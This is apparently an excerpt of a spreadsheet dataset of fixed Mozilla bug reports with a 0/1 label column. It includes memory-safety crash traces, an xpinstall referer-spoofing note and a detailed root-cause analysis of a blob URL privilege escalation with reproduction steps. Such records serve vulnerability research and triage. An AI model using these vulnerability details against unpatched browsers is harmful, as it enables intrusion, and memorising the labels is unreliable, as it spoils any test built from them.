      <c r="K393" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L393" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M393" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N393" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O393" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P393" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q393" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R393" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S393" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T393" t="n">
        <v>1</v>
      </c>
      <c r="U393" t="n">
        <v>0</v>
      </c>
      <c r="V393" t="n">
        <v>13</v>
      </c>
      <c r="W393" t="inlineStr">
        <is>
          <t>Created attachment 8858349
test_case.ttf
Found in graphite git revision 8afc7d00.
STR:
With an ASan build run:
./g2fonttest test_case.ttf -auto -demand
==21704==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60d0000000c6 at pc 0x0000005702c7 bp 0x7ffefba26fd0 sp 0x7ffefba26fc8
READ of size 2 at 0x60d0000000c6 thread T0
    #0 0x5702c6 in graphite2::Silf::getClassGlyph(unsigned short, unsigned int) const src/Silf.cpp:349:17
    #1 0x5f2253 in graphite2::Segment::getClassGlyph(unsigned short, unsigned short) const src/inc/Segment.h:128:76
    #2 0x5f2253 in (anonymous namespace)::put_glyph_8bit_obs(unsigned char const*&amp;, int*&amp;, int*, regbank&amp;) src/inc/opcodes.h:226
    #3 0x5ee2f4 in graphite2::vm::Machine::run(void* const*, unsigned char const*, graphite2::Slot**&amp;) src/call_machine.cpp:121:12
    #4 0x5eb4a9 in graphite2::vm::Machine::Code::run(graphite2::vm::Machine&amp;, graphite2::Slot**&amp;) const src/Code.cpp:746:15
    #5 0x5d567f in graphite2::Pass::doAction(graphite2::vm::Machine::Code const*, graphite2::Slot*&amp;, graphite2::vm::Machine&amp;) const src/Pass.cpp:682:26
    #6 0x5cf59b in graphite2::Pass::findNDoRule(graphite2::Slot*&amp;, graphite2::vm::Machine&amp;, graphite2::FiniteStateMachine&amp;) const src/Pass.cpp:548:33
    #7 0x5cda88 in graphite2::Pass::runGraphite(graphite2::vm::Machine&amp;, graphite2::FiniteStateMachine&amp;, bool) const src/Pass.cpp:417:13
    #8 0x571411 in graphite2::Silf::runGraphite(graphite2::Segment*, unsigned char, unsigned char, int) const src/Silf.cpp:429:33
    #9 0x533dea in graphite2::Face::runGraphite(graphite2::Segment*, graphite2::Silf const*) const src/Face.cpp:180:23
    #10 0x527695 in graphite2::Segment::runGraphite() src/inc/Segment.h:97:53
    #11 0x524b62 in (anonymous namespace)::makeAndInitialize(graphite2::Font const*, graphite2::Face const*, unsigned int, graphite2::FeatureVal const*, gr_encform, void const*, unsigned long, int) src/gr_segment.cpp:46:73
    #12 0x524b62 in gr_make_seg src/gr_segment.cpp:105
    #13 0x51aaea in Parameters::testFileFont() const gr2fonttest/gr2FontTest.cpp
    #14 0x51c809 in main gr2fonttest/gr2FontTest.cpp:798:20
    #15 0x7f778a1a482f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #16 0x41d498 in _start (gr2fonttest+0x41d498)</t>
        </is>
      </c>
      <c r="X393" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="394">
      <c r="A394" t="n">
        <v>645699</v>
      </c>
      <c r="B394" t="inlineStr">
        <is>
          <t>2011-03-28 08:09:57 -0700</t>
        </is>
      </c>
      <c r="C394" t="inlineStr">
        <is>
          <t>A non-whitelisted site can trigger xpinstall</t>
        </is>
      </c>
      <c r="D394" t="inlineStr">
        <is>
          <t>2011-07-12 08:24:11 -0700</t>
        </is>
      </c>
      <c r="E394" t="n">
        <v>1</v>
      </c>
      <c r="F394" t="n">
        <v>1</v>
      </c>
      <c r="G394" t="n">
        <v>3</v>
      </c>
      <c r="H394" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I394" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J394" t="inlineStr">
        <is>
          <t>Add-ons Manager</t>
        </is>
      </c>
      <c r="K394" t="inlineStr">
        <is>
          <t>2.0 Branch</t>
        </is>
      </c>
      <c r="L394" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M394" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N394" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O394" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P394" t="inlineStr">
        <is>
          <t>[sg:low]</t>
        </is>
      </c>
      <c r="Q394" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R394" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S394" t="inlineStr">
        <is>
          <t>mozilla5</t>
        </is>
      </c>
      <c r="T394" t="n">
        <v>1</v>
      </c>
      <c r="U394" t="n">
        <v>0</v>
      </c>
      <c r="V394" t="n">
        <v>16</v>
      </c>
      <c r="W394" t="inlineStr">
        <is>
          <t>http://mxr.mozilla.org/mozilla-central/source/toolkit/mozapps/extensions/content/extensions-content.js#93
93     install: function(aArgs, aCallback) {
94       if (!aArgs || typeof aArgs != "object")
95         throw new Error("Incorrect arguments passed to InstallTrigger.install()");
96 
97       var params = {
98         installerId: this.installerId,
99         mimetype: "application/x-xpinstall",
100         referer: this.window.location.href,
101         uris: [],
102         hashes: [],
103         names: [],
104         icons: [],
105       };
this.window is a SJOW.  And it's possible to redefine window.location.  Thus,
content code can control this.window.location.href.</t>
        </is>
      </c>
      <c r="X394" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="395">
      <c r="A395" t="n">
        <v>466845</v>
      </c>
      <c r="B395" t="inlineStr">
        <is>
          <t>2008-11-26 09:56:00 -0800</t>
        </is>
      </c>
      <c r="C395" t="inlineStr">
        <is>
          <t>Crash [@ nsViewManager::CreateView] with ::first-line position: absolute and -moz-transform</t>
        </is>
      </c>
      <c r="D395" t="inlineStr">
        <is>
          <t>2011-06-09 14:58:49 -0700</t>
        </is>
      </c>
      <c r="E395" t="n">
        <v>1</v>
      </c>
      <c r="F395" t="n">
        <v>1</v>
      </c>
      <c r="G395" t="n">
        <v>3</v>
      </c>
      <c r="H395" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I395" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J395" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K395" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L395" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M395" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N395" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O395" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P395" t="inlineStr"/>
      <c r="Q395" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R395" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S395" t="inlineStr">
        <is>
          <t>mozilla1.9.1b3</t>
        </is>
      </c>
      <c r="T395" t="n">
        <v>1</v>
      </c>
      <c r="U395" t="n">
        <v>0</v>
      </c>
      <c r="V395" t="n">
        <v>11</v>
      </c>
      <c r="W395" t="inlineStr">
        <is>
          <t>Created attachment 350174
testcase
See testcase, which usually crashes after a few reloads in current trunk build.
http://crash-stats.mozilla.com/report/index/6543a859-bb51-4997-9f8e-8f5412081126?p=1
0  	kernel32.dll  	RaiseException  	
1 	mozcrt19.dll 	_CxxThrowException 	throw.cpp:159
2 	mozcrt19.dll 	operator new 	obj-firefox/memory/jemalloc/src/new.cpp:57
3 	xul.dll 	nsViewManager::CreateView 	view/src/nsViewManager.cpp:289
4 	xul.dll 	nsHTMLContainerFrame::CreateViewForFrame 	layout/generic/nsHTMLContainerFrame.cpp:698
5 	xul.dll 	nsCSSFrameConstructor::CreateContinuingFrame 	layout/base/nsCSSFrameConstructor.cpp:10480
6 	xul.dll 	nsHTMLContainerFrame::CreateNextInFlow 	layout/generic/nsHTMLContainerFrame.cpp:495
7 	xul.dll 	nsBlockFrame::CreateContinuationFor 	layout/generic/nsBlockFrame.cpp:3753
8 	xul.dll 	xul.dll@0x2f7acb 	
9 	xul.dll 	nsBlockFrame::DoReflowInlineFrames 	layout/generic/nsBlockFrame.cpp:3409
10 	xul.dll 	nsBlockFrame::ReflowInlineFrames 	layout/generic/nsBlockFrame.cpp:3258
11 	xul.dll 	nsBlockFrame::ReflowLine 	layout/generic/nsBlockFrame.cpp:2324
12 	xul.dll 	nsBlockFrame::ReflowDirtyLines 	layout/generic/nsBlockFrame.cpp:1904
13 	xul.dll 	nsBlockFrame::Reflow 	layout/generic/nsBlockFrame.cpp:954
14 	xul.dll 	nsAbsoluteContainingBlock::ReflowAbsoluteFrame 	layout/generic/nsAbsoluteContainingBlock.cpp:436
15 	xul.dll 	xul.dll@0x2f74a5 	
16 	xul.dll 	xul.dll@0x2fb545 	
17 	xul.dll 	nsAbsoluteContainingBlock::ReflowAbsoluteFrame 	layout/generic/nsAbsoluteContainingBlock.cpp:436
18 	xul.dll 	xul.dll@0x2f74a5 	
19 	xul.dll 	xul.dll@0x2f90f2 	
20 	xul.dll 	nsContainerFrame::ReflowChild 	layout/generic/nsContainerFrame.cpp:793
21 	xul.dll 	nsHTMLScrollFrame::ReflowScrolledFrame 	layout/generic/nsGfxScrollFrame.cpp:528
22 	xul.dll 	nsHTMLScrollFrame::ReflowContents 	layout/generic/nsGfxScrollFrame.cpp:622
23 	xul.dll 	nsHTMLScrollFrame::Reflow 	layout/generic/nsGfxScrollFrame.cpp:823
24 	xul.dll 	nsContainerFrame::ReflowChild 	layout/generic/nsContainerFrame.cpp:793
25 	xul.dll 	ViewportFrame::Reflow 	layout/generic/nsViewportFrame.cpp:283
26 	xul.dll 	PresShell::DoReflow 	layout/base/nsPresShell.cpp:6331
27 	xul.dll 	PresShell::ProcessReflowCommands 	layout/base/nsPresShell.cpp:6437
28 	xul.dll 	PresShell::DoFlushPendingNotifications 	layout/base/nsPresShell.cpp:4573
29 	xul.dll 	PresShell::ReflowEvent::Run 	layout/base/nsPresShell.cpp:6194
30 	xul.dll 	nsThread::ProcessNextEvent 	xpcom/threads/nsThread.cpp:510
31 	xul.dll 	nsBaseAppShell::Run 	widget/src/xpwidgets/nsBaseAppShell.cpp:170
32 	nspr4.dll 	PR_GetEnv 	
33 	firefox.exe 	wmain 	toolkit/xre/nsWindowsWMain.cpp:87
34 	firefox.exe 	firefox.exe@0x2197 	
35 	kernel32.dll 	BaseProcessStart</t>
        </is>
      </c>
      <c r="X395" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="396">
      <c r="A396" t="n">
        <v>1104149</v>
      </c>
      <c r="B396" t="inlineStr">
        <is>
          <t>2014-11-24 09:18:51 -0800</t>
        </is>
      </c>
      <c r="C396" t="inlineStr">
        <is>
          <t>Digest cycle error entering related bug, on stage, prod, and latest master</t>
        </is>
      </c>
      <c r="D396" t="inlineStr">
        <is>
          <t>2015-05-20 04:29:44 -0700</t>
        </is>
      </c>
      <c r="E396" t="n">
        <v>1</v>
      </c>
      <c r="F396" t="n">
        <v>1</v>
      </c>
      <c r="G396" t="n">
        <v>7</v>
      </c>
      <c r="H396" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I396" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J396" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K396" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L396" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M396" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N396" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O396" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P396" t="inlineStr"/>
      <c r="Q396" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R396" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S396" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T396" t="n">
        <v>1</v>
      </c>
      <c r="U396" t="n">
        <v>0</v>
      </c>
      <c r="V396" t="n">
        <v>9</v>
      </c>
      <c r="W396" t="inlineStr">
        <is>
          <t>There's a minor angular digest cycle error that occurs on stage and in latest master. Currently production is ok.
To reproduce
o open stage and click on any job
o open the pinboard
o click on the [+] related bugs icon
o type "1" or any number and hit enter
Expected
o the bug number is added
Observed
o the bug number is added
o a $digest cycle error appears on the console
Error: [$rootScope:inprog] $digest already in progress
at https://treeherder.allizom.org/ui/js/index.min-3b17fb76ba2b817441495f3d728b663d.js:4:30959</t>
        </is>
      </c>
      <c r="X396" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="397">
      <c r="A397" t="n">
        <v>1366595</v>
      </c>
      <c r="B397" t="inlineStr">
        <is>
          <t>2017-05-21 09:39:12 -0700</t>
        </is>
      </c>
      <c r="C397" t="inlineStr">
        <is>
          <t>Stack-use-after-scope in NS_strlen while logging errors in XHR</t>
        </is>
      </c>
      <c r="D397" t="inlineStr">
        <is>
          <t>2024-05-30 09:33:39 -0700</t>
        </is>
      </c>
      <c r="E397" t="n">
        <v>1</v>
      </c>
      <c r="F397" t="n">
        <v>1</v>
      </c>
      <c r="G397" t="n">
        <v>3</v>
      </c>
      <c r="H397" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I397" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J397" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K397" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L397" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M397" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N397" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O397" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P397" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q397" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R397" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S397" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T397" t="n">
        <v>1</v>
      </c>
      <c r="U397" t="n">
        <v>0</v>
      </c>
      <c r="V397" t="n">
        <v>15</v>
      </c>
      <c r="W397" t="inlineStr">
        <is>
          <t>Created attachment 8869834
Testcase
==10811==ERROR: AddressSanitizer: stack-use-after-scope on address 0x7fff25529080 at pc 0x7faccf02f971 bp 0x7fff25527800 sp 0x7fff255277f8
READ of size 2 at 0x7fff25529080 thread T0 (Web Content)
SCARINESS: 14 (2-byte-read-stack-use-after-scope)
#0 0x7faccf02f970 in NS_strlen(char16_t const*) xpcom/base/nsCRTGlue.cpp:83:23
#1 0x7faccf00d50a in cvt_S(SprintfStateStr*, char16_t const*, int, int, int) xpcom/string/nsTextFormatter.cpp:522:17
#2 0x7faccf0095c1 in dosprintf(SprintfStateStr*, char16_t const*, __va_list_tag*) xpcom/string/nsTextFormatter.cpp:1139:14
#3 0x7faccf00655e in vsmprintf xpcom/string/nsTextFormatter.cpp:1307:8
#4 0x7faccf00655e in nsTextFormatter::smprintf(char16_t const*, ...) xpcom/string/nsTextFormatter.cpp:1265
#5 0x7faccf25fcae in nsStringBundle::FormatString(char16_t const*, char16_t const**, unsigned int, char16_t**) intl/strres/nsStringBundle.cpp:340:5
#6 0x7faccf25fa63 in nsStringBundle::FormatStringFromName(char16_t const*, char16_t const**, unsigned int, char16_t**) intl/strres/nsStringBundle.cpp:188:10
#7 0x7facd1aec35d in nsContentUtils::FormatLocalizedString(nsContentUtils::PropertiesFile, char const*, char16_t const**, unsigned int, nsXPIDLString&amp;) dom/base/nsContentUtils.cpp:3867:18
#8 0x7facd1aecf99 in nsContentUtils::ReportToConsole(unsigned int, nsACString const&amp;, nsIDocument const*, nsContentUtils::PropertiesFile, char const*, char16_t const**, unsigned int, nsIURI*, nsString const&amp;, unsigned int, unsigned int) dom/base/nsContentUtils.cpp:3932:10
#9 0x7facd5ad43a5 in LogMessage dom/xhr/XMLHttpRequestMainThread.cpp:446:3
#10 0x7facd5ad43a5 in mozilla::dom::XMLHttpRequestMainThread::SetRequestHeader(nsACString const&amp;, nsACString const&amp;) dom/xhr/XMLHttpRequestMainThread.cpp:3115
#11 0x7facd5aef3dd in mozilla::dom::XMLHttpRequestMainThread::SetRequestHeader(nsACString const&amp;, nsACString const&amp;, mozilla::ErrorResult&amp;) dom/xhr/XMLHttpRequestMainThread.h:274:11
#12 0x7facd3482163 in mozilla::dom::XMLHttpRequestBinding::setRequestHeader(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&amp;) objdir-ff-asan/dom/bindings/XMLHttpRequestBinding.cpp:461:9
#13 0x7facd3c97445 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) dom/bindings/BindingUtils.cpp:2954:13
#14 0x7facd9daf3a0 in CallJSNative js/src/jscntxtinlines.h:293:15
#15 0x7facd9daf3a0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) js/src/vm/Interpreter.cpp:470
#16 0x7facd9d8c0dd in CallFromStack js/src/vm/Interpreter.cpp:521:12
#17 0x7facd9d8c0dd in Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:3028
#18 0x7facd9d79488 in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:410:12
#19 0x7facd9db1a99 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) js/src/vm/Interpreter.cpp:699:15
#20 0x7facd9db2332 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) js/src/vm/Interpreter.cpp:731:12
#21 0x7facda7e28a9 in Evaluate(JSContext*, js::ScopeKind, JS::Handle&lt;JSObject*&gt;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JS::Value&gt;) js/src/jsapi.cpp:4633:19
#22 0x7facda7e3600 in Evaluate js/src/jsapi.cpp:4658:12
#23 0x7facda7e3600 in JS::Evaluate(JSContext*, JS::AutoObjectVector&amp;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JS::Value&gt;) js/src/jsapi.cpp:4716
#24 0x7facd2011f52 in nsJSUtils::ExecutionContext::CompileAndExec(JS::CompileOptions&amp;, JS::SourceBufferHolder&amp;) dom/base/nsJSUtils.cpp:232:8
#25 0x7facd5b2b722 in mozilla::dom::ScriptLoader::EvaluateScript(mozilla::dom::ScriptLoadRequest*) dom/script/ScriptLoader.cpp:2035:23
#26 0x7facd5b27211 in mozilla::dom::ScriptLoader::ProcessRequest(mozilla::dom::ScriptLoadRequest*) dom/script/ScriptLoader.cpp:1753:10
#27 0x7facd5b0dc57 in mozilla::dom::ScriptLoader::ProcessScriptElement(nsIScriptElement*) dom/script/ScriptLoader.cpp:1455:10
#28 0x7facd5b0a13e in mozilla::dom::ScriptElement::MaybeProcessScript() dom/script/ScriptElement.cpp:149:18
#29 0x7facd10174e0 in AttemptToExecute objdir-ff-asan/dist/include/nsIScriptElement.h:225:18
#30 0x7facd10174e0 in nsHtml5TreeOpExecutor::RunScript(nsIContent*) parser/html/nsHtml5TreeOpExecutor.cpp:698
#31 0x7facd10105c5 in nsHtml5TreeOpExecutor::RunFlushLoop() parser/html/nsHtml5TreeOpExecutor.cpp:499:7
#32 0x7facd101a68b in nsHtml5ExecutorFlusher::Run() parser/html/nsHtml5StreamParser.cpp:129:20
#33 0x7faccf17fe74 in mozilla::SchedulerGroup::Runnable::Run() xpcom/threads/SchedulerGroup.cpp:365:25
#34 0x7faccf1af789 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:1302:14
#35 0x7faccf1bb2b0 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/threads/nsThreadUtils.cpp:393:10
#36 0x7faccffeb741 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:96:21
#37 0x7faccff41cbf in RunInternal ipc/chromium/src/base/message_loop.cc:238:10
#38 0x7faccff41cbf in RunHandler ipc/chromium/src/base/message_loop.cc:231
#39 0x7faccff41cbf in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:211
#40 0x7facd5c4670a in nsBaseAppShell::Run() widget/nsBaseAppShell.cpp:156:27
#41 0x7facd98296fb in XRE_RunAppShell() toolkit/xre/nsEmbedFunctions.cpp:893:22
#42 0x7faccff41cbf in RunInternal ipc/chromium/src/base/message_loop.cc:238:10
#43 0x7faccff41cbf in RunHandler ipc/chromium/src/base/message_loop.cc:231
#44 0x7faccff41cbf in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:211
#45 0x7facd982918d in XRE_InitChildProcess(int, char**, XREChildData const*) toolkit/xre/nsEmbedFunctions.cpp:709:34
#46 0x5250c2 in content_process_main ipc/contentproc/plugin-container.cpp:64:30
#47 0x5250c2 in main browser/app/nsBrowserApp.cpp:285
#48 0x7face9ebaf44 in __libc_start_main /build/eglibc-MjiXCM/eglibc-2.19/csu/libc-start.c:287
Address 0x7fff25529080 is located in stack of thread T0 (Web Content) at offset 288 in frame
#0 0x7facd5ad3dcf in mozilla::dom::XMLHttpRequestMainThread::SetRequestHeader(nsACString const&amp;, nsACString const&amp;) dom/xhr/XMLHttpRequestMainThread.cpp:3090
This frame has 5 object(s):
[32, 40) 'doc.i' (line 442)
[64, 80) 'ref.tmp.i' (line 446)
[96, 192) 'value' (line 3102)
[224, 232) 'params' (line 3114)
[256, 416) 'ref.tmp' (line 3114) &lt;== Memory access at offset 288 is inside this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-use-after-scope (/mnt/scratch0/clusterfuzz/slave-bot/builds/linux_asan_firefox/custom/firefox/libxul.so+0x1f70970)
Shadow bytes around the buggy address:
0x100064a9d1c0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 f3 f3
0x100064a9d1d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100064a9d1e0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
0x100064a9d1f0: 00 f2 f2 f2 00 00 f2 f2 00 00 00 00 00 00 00 00
0x100064a9d200: 00 00 00 00 f2 f2 f2 f2 00 f2 f2 f2 f8 f8 f8 f8
=&gt;0x100064a9d210:[f8]f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
0x100064a9d220: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00
0x100064a9d230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100064a9d240: f1 f1 f1 f1 00 00 f2 f2 00 00 f2 f2 00 00 f3 f3
0x100064a9d250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100064a9d260: 00 00 00 00 f1 f1 f1 f1 00 00 f2 f2 00 00 00 f2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0811==ABORTING</t>
        </is>
      </c>
      <c r="X397" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="398">
      <c r="A398" t="n">
        <v>1691153</v>
      </c>
      <c r="B398" t="inlineStr">
        <is>
          <t>2021-02-05 15:32:11 -0800</t>
        </is>
      </c>
      <c r="C398" t="inlineStr">
        <is>
          <t>Blob URLs loaded by system principal may be given the incorrect principal</t>
        </is>
      </c>
      <c r="D398" t="inlineStr">
        <is>
          <t>2021-11-22 23:38:44 -0800</t>
        </is>
      </c>
      <c r="E398" t="n">
        <v>1</v>
      </c>
      <c r="F398" t="n">
        <v>1</v>
      </c>
      <c r="G398" t="n">
        <v>3</v>
      </c>
      <c r="H398" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I398" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J398" t="inlineStr">
        <is>
          <t>DOM: File</t>
        </is>
      </c>
      <c r="K398" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L398" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M398" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N398" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O398" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P398" t="inlineStr">
        <is>
          <t>[post-critsmash-triage] [qa-triaged][adv-main88+][adv-esr78.10+]</t>
        </is>
      </c>
      <c r="Q398" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R398" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S398" t="inlineStr">
        <is>
          <t>88 Branch</t>
        </is>
      </c>
      <c r="T398" t="n">
        <v>1</v>
      </c>
      <c r="U398" t="n">
        <v>0</v>
      </c>
      <c r="V398" t="n">
        <v>23</v>
      </c>
      <c r="W398" t="inlineStr">
        <is>
          <t>Created attachment 9201556
poc
### STR (from a fresh browser)
1. Load the attached proof of concept. A blob URL will appear in the document, copy it to the clipboard.
2. Open a new tab, paste the blob URL in the address bar, and load it
Expected: The blob should load and display the string `undefined`
Actual: The blob loads and displays the string `[object BrowsingContext]`
### Likely Cause
The reason behind this display being different is that the blob URL's document was loaded with the system principal, and thus has privileged access. This is caused by a series of errors in the code which transmits information about Blob URLs to content processes (thanks :asuth for helping me figure out what's going on here!).
1. The code in `ContentParent::TransmitBlobURLsForPrincipal` includes the wrong principal in the `BlobURLRegistrationData` to be sent to the content process. Specifically the registration is created with the principal `aPrincipal`, which is the principal passed to the function, rather than the principal `aBlobPrincipal` which was used to register the blob. (https://searchfox.org/mozilla-central/rev/400614dec36182ba6d0bec2a18044c47df960a1f/dom/ipc/ContentParent.cpp#6123,6137). This means that the wrong principal will be transmitted in cases where these principals don't match.
2. The code uses `aPrincipal-&gt;Subsumes(aBlobPrincipal)` instead of `-&gt;Equals`, meaning it will pass if `aPrincipal` is an expanded or system principal. This combines with the first issue to mean that if `aPrincipal` is the system principal, a registration will be transmitted with the system principal for all registered Blob URLs (https://searchfox.org/mozilla-central/rev/400614dec36182ba6d0bec2a18044c47df960a1f/dom/ipc/ContentParent.cpp#6126)
3. When bug 1626573 was fixed, logic was added to various codepaths which can cause URLs to load from the parent process to try to force blob URLs to be registered in the content process before the load completes. Unfortunately, this code passes `triggeringPrincipal` as the principal to use (https://searchfox.org/mozilla-central/rev/400614dec36182ba6d0bec2a18044c47df960a1f/docshell/base/BrowsingContext.cpp#1847-1848, https://searchfox.org/mozilla-central/rev/400614dec36182ba6d0bec2a18044c47df960a1f/netwerk/ipc/DocumentLoadListener.cpp#1835), which is the system principal in the case where the load is triggered by browser UI (e.g. through pasting a URL in the address bar).  This combines with the previous two bugs to cause us to register blob URLs with the wrong (potentially system) principal. 
### Potential Fix
We should fix all 3 of these core issues in order to make sure we transmit the correct blob URLs with the correct principals. The first issue can be fixed by passing `aBlobPrincipal` instead of `aPrincipal` to the various callsites in the function. The second can be fixed by using `-&gt;Equals` instead of `-&gt;Subsumes`.
The third bug should be fixed by using the actual principal of the relevant blob URL rather than the triggering principal. This should be doable by removing the `aPrincipal` argument from `TransmitBlobDataIfBlobURL`, and instead implementing it as:
```c++
nsCOMPtr&lt;nsIPrincipal&gt; blobPrincipal;
if (BlobURLProtocolHandler::GetBlobURLPrincipal(aURI, getter_AddRefs(blobPrincipal))) {
  TransmitBlobURLsForPrincipal(blobPrincipal);
}
```
### Exploitability
While this is a serious issue, we are fortunate that it is somewhat tricky to get full system-principal permissions with it. The user has to load the URL in question in a different process than the original page, and the triggering principal must be the system principal (which hopefully requires direct user intervention), such as the user pasting the blob URL into their address bar.</t>
        </is>
      </c>
      <c r="X398" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="399">
      <c r="A399" t="n">
        <v>122633</v>
      </c>
      <c r="B399" t="inlineStr">
        <is>
          <t>2002-01-30 11:18:05 -0800</t>
        </is>
      </c>
      <c r="C399" t="inlineStr">
        <is>
          <t>NSS 3.4 Mozilla client does not recognize CA certs</t>
        </is>
      </c>
      <c r="D399" t="inlineStr">
        <is>
          <t>2016-09-27 13:03:20 -0700</t>
        </is>
      </c>
      <c r="E399" t="n">
        <v>1</v>
      </c>
      <c r="F399" t="n">
        <v>1</v>
      </c>
      <c r="G399" t="n">
        <v>6</v>
      </c>
      <c r="H399" t="inlineStr">
        <is>
          <t>Graveyard</t>
